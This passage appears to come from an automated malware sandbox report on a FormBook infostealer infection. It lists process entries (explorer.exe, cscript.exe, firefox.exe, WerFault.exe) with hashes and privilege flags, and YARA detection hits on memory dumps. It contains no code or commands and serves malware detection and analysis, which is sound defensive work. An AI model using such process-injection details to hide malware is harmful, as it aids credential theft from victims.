• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 7
Start time: 21:38:58
Start date: 17/03/2023
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff71ac00000
File size: 4849904 bytes
MD5 hash: 5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 8
Start time: 21:39:03
Start date: 17/03/2023
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cscript.exe
Imagebase: 0x6a0000
File size: 144896 bytes
MD5 hash: 13783FF4A2B614D7FBD58F5EEBDEDEF6
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: moderate

Target ID: 9
Start time: 21:39:24
Start date: 17/03/2023
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase: 0x7ff739710000
File size: 597432 bytes
MD5 hash: FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 12
Start time: 21:39:29
Start date: 17/03/2023
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
Imagebase: 0x7ff6e2850000
File size: 568632 bytes
MD5 hash: 5C06542FED8EE68994D43938E7326D75
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

                                                                    No disassembly